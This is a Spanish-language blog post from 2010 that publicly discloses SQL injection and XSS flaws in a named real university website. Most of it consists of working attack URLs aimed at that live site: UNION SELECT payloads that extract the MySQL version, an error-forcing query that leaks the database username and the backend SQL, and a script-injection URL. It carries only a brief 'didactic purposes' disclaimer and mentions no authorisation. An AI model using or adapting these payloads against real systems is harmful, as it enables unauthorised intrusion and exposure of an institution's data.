domingo, 31 de octubre de 2010

Multiples vulnerabilidades en www.unmsm.edu.pe

Hace unos días publiqué un par de vulnerabilidades SQLi en paginas de la universidad. Pues parece que la lista va a seguir creciendo xD

Buscando un poco encontré un par de nuevas URLs que permiten incluir código SQL en las consultas:

http://www.unmsm.edu.pe/index.php?a=mas&tipo=' [SQLi]
http://www.unmsm.edu.pe/nts.php?id=' [SQLi]

Con la ultima se pueden hacer algunas cosas interesantes, por ejemplo se puede obtener la versión del MySQL:

http://www.unmsm.edu.pe/nts.php?id=-1' UNION SELECT 1,2,3,4,5,VERSION() FROM entradas WHERE ''='

En la salida podremos observar que la versión es "5.0.45" xD

Otra cosa que podemos hacer es averiguar el username de la base de datos. Para ello generaremos un error de falta de privilegios };]

http://www.unmsm.edu.pe/nts.php?id=-1' UNION SELECT 1,2,3,4,5,6 FROM mysql.user WHERE ''='

Salida:

Error DBselectAllWhere.[SELECT titulo,ID,intro,hora,imagen,fecha_inicio FROM entradas WHERE tipo='Nota' AND estado=1 AND ID='-1' UNION SELECT 1,2,3,4,5,6 FROM mysql.user WHERE ''='' ORDER BY fecha_inicio desc, hora desc limit 0,7] MYSQL dice : SELECT command denied to user 'rrpp'@'localhost' for table 'user'

Se puede observar que el nombre del usuario es "rrpp" :]

También encontramos una vulnerabilidad XSS indirecta. Ya antes habíamos encontrado algo así en el buscador de la biblioteca.

http://alguienenlafisi.blogspot.com/2009/12/vulnerabilidad-xss-en-el-sistema-de.html

La URL del XSS es:

http://www.unmsm.edu.pe/?url="[XSS]

Por ejemplo:

http://www.unmsm.edu.pe/?url="<script>alert('XSS by Alguien xD')</script>

Esto es todo por ahora, quizá luego sigan apareciendo mas bugs...

Hasta pronto y no hagan travesuras xD

Todo lo explicado aquí es solo con fines didácticos. El autor no se hace responsable por el uso que se le pueda dar a esta información.

No hay comentarios:

Publicar un comentario